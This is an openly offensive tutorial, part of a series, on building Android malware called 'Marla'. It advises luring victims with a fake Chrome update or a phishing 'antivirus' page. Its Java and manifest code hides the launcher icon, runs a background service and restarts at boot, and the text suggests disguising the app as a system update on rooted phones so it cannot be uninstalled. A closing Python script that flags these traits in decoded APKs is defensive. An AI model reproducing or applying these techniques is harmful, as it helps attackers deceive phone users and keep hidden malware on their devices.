A Tumor Called Marla
Hi everyone, today we will cover how to hide our malware from the user and run our malware as a service.
When the malware runs for the first time, it will hide the app icon from the user's launcher and run a service.
The service only queries the OS version for the moment; we will be much more malicious in the next tutorial.
How to infect the user?
When the user installs the malware, we want it to be persistent.
We need to force the user to install our malware and run it, but how?
Social Engineering
Here is one of the ways to force the user to download Marla:
A fake Chrome update (most users use Chrome on Android) or a fake antivirus (a phishing page telling the user he has 10 viruses, to trick him into downloading your “Antivirus”).
If you choose the antivirus way, make an app that looks like a legit antivirus.
Once the user downloads the app, installs it and runs it, we are good.
Why should we use these techniques?
On new versions of Android, an app needs to be run once before it can be started at boot time and use its permissions (see Android Malware for more information about permissions).
Hiding app icon
Let’s start to code and hide our app icon
Today our task is to disable a component of our application, here the icon. (You can start from scratch or use the old code from the previous tutorial.)
N.B.: The app won’t be persistent if the user’s phone isn’t rooted; the user will be able to uninstall the malware. However, if the Android phone is rooted, we can hide the app as a system app and give it a name like com.android.update; he won’t be able to uninstall a system app.
Main Activity
package com.android.marla;

import android.content.pm.PackageManager;
import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.widget.Toast;

public class MainActivity extends AppCompatActivity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        PackageManager pm = this.getPackageManager();
        //The line below will hide your app icon
        pm.setComponentEnabledSetting(
                getComponentName(),
                PackageManager.COMPONENT_ENABLED_STATE_DISABLED,
                PackageManager.DONT_KILL_APP);
        //Just show a Toast
        Toast.makeText(this, "Updating your system please wait ...", Toast.LENGTH_LONG);
    }
}
Here is what you should see
Now if you kill the app after a moment.
No Marla app
Run a service
We want a running service that can gather information. Let’s make a new class
package com.android.marla;

import android.app.Service;
import android.content.Intent;
import android.os.Handler;
import android.os.IBinder;
import android.os.Looper;
import android.support.annotation.Nullable;
import android.widget.Toast;

public class MainService extends Service{
    @Nullable
    @Override
    public IBinder onBind(Intent intent) {
        return null;
    }

    public void onCreate()
    {
        Handler handler = new Handler(Looper.getMainLooper());
        handler.post(new Runnable(){
            @Override
            public void run() {
                Toast.makeText(getApplicationContext(),"Malware started",Toast.LENGTH_LONG).show();
            }
        });
    }
}
Here I just create a Toast as a PoC; here is the function:
public void onCreate()
{
    Handler handler = new Handler(Looper.getMainLooper());
    handler.post(new Runnable(){
        @Override
        public void run() {
            Toast.makeText(getApplicationContext(),"Malware started",Toast.LENGTH_LONG).show();
        }
    });
}
In your Android manifest, add the service:
<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.android.marla">
    <!--PERMISSION-->
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <!--PERMISSION-->
    <application
        android:allowBackup="true"
        android:icon="@mipmap/ic_launcher"
        android:label="@string/app_name"
        android:supportsRtl="true"
        android:theme="@style/AppTheme">
        <activity android:name=".MainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
        <!-- THE SERVICE IS BELOW-->
        <service android:name=".MainService"/>
    </application>
</manifest>
Well done! You’ve created a service; now let’s run it at boot time. (I hope you remember the previous tutorial for this part.)
Receiver:
package com.android.marla;

import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;

public class BootReceiver extends BroadcastReceiver {
    @Override
    public void onReceive(Context context, Intent intent) {
        /** if the boot is completed **/
        if(Intent.ACTION_BOOT_COMPLETED.equals(intent.getAction())){
            /** Start the MainActivity.class everytime the phone boot**/
            Intent i = new Intent(context, MainActivity.class);
            context.startActivity(i);
        }
    }
}
Well done, your application is not malicious for the moment. Your app looks like adware for the moment.
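Seen from the analysis side, the two behaviours built on this page (disabling the launcher component and requesting a boot-time hook) leave static traces in a decoded APK. The following is an added example, not code from the original tutorial: a Python triage check whose helper names (`triage`, `names_with`) and embedded manifest and source samples are constructed for illustration from the listings above.

```python
import re
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"  # android: attribute namespace

# Constructed sample: the manifest from this page, trimmed to the relevant elements.
MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.android.marla">
  <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
  <application>
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <service android:name=".MainService"/>
  </application>
</manifest>"""

# Constructed sample: the call from this page's MainActivity, as a decompiler might print it.
SOURCE = """pm.setComponentEnabledSetting(getComponentName(),
    PackageManager.COMPONENT_ENABLED_STATE_DISABLED, PackageManager.DONT_KILL_APP);"""

# One setComponentEnabledSetting(...) statement that passes the DISABLED state.
DISABLE = re.compile(r"setComponentEnabledSetting\s*\([^;]*COMPONENT_ENABLED_STATE_DISABLED")

def names_with(root, tag, child, value):
    # Names of <tag> components that contain a <child> element named `value`.
    return [c.get(A + "name") for c in root.iter(tag)
            if any(e.get(A + "name") == value for e in c.iter(child))]

def triage(manifest_xml, source_text):
    root = ET.fromstring(manifest_xml.encode("utf-8"))
    perms = {p.get(A + "name") for p in root.iter("uses-permission")}
    launchers = names_with(root, "activity", "category", "android.intent.category.LAUNCHER")
    findings = {
        "launcher_activities": launchers,
        "services": [s.get(A + "name") for s in root.iter("service")],
        "boot_permission": "android.permission.RECEIVE_BOOT_COMPLETED" in perms,
        "boot_receivers": names_with(root, "receiver", "action",
                                     "android.intent.action.BOOT_COMPLETED"),
        "disables_component": bool(DISABLE.search(source_text)),
    }
    # Icon hiding as described here: a launcher entry exists and the code disables a component.
    findings["hides_launcher_icon"] = bool(launchers) and findings["disables_component"]
    return findings

if __name__ == "__main__":
    print(triage(MANIFEST, SOURCE))
```

The source check is a textual heuristic: it misses a call whose state argument is passed through a variable, so treat a negative result as inconclusive and confirm against the decompiled code.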